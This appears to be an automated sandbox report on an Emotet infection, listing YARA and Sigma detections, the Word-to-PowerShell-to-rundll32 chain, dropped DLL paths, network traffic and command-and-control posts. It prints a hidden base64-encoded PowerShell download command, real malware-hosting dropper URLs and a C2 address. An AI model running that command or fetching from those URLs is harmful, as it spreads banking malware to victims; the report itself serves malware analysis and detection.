00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 49 entries

Unpacked PEs

Source	Rule	Description	Author
20.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.750000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.400000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.430000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.400000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.930000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.160000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
23.2.rundll32.exe.180000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.6b0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.400000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.270000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
23.2.rundll32.exe.550000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.270000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
21.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
24.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.280000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.210000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
23.2.rundll32.exe.180000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.280000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.280000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.930000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
21.2.rundll32.exe.400000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.270000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.4a0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
21.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
24.2.rundll32.exe.2010000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
20.2.rundll32.exe.400000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
22.2.rundll32.exe.450000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.400000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.160000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.4a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
24.2.rundll32.exe.2010000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.400000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.210000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.6b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.280000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
20.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
21.2.rundll32.exe.400000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.460000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.400000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.280000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.430000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.750000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.400000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
22.2.rundll32.exe.450000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
22.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.280000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
20.2.rundll32.exe.400000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.460000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
24.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2f0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.280000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.280000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
23.2.rundll32.exe.550000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
22.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2b0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.270000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.400000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 67 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2940, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, ProcessId: 3044

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAd

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://nightlifemumbai.club/x/0wBD3/	Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/	Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/	Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll

Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Show sources

Source: unknown	HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp

Spreading:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: nightlifemumbai.club

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 190.55.186.229:80

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp	String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp	String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp	String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp	String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429

Source: global traffic	HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 212.227.200.73 212.227.200.73
Source: Joe Sandbox View	IP Address: 190.55.186.229 190.55.186.229

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic

HTTP traffic detected: POST /pvaadnb3/ HTTP/1.1DNT: 0Referer: 190.55.186.229/pvaadnb3/Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTCUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 5508Connection: Keep-AliveCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown	TCP traffic detected without corresponding DNS query: 190.55.186.229

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F20-30CA-4646-ACFF-79FC9E14ADCB}.tmp

Jump to behavior

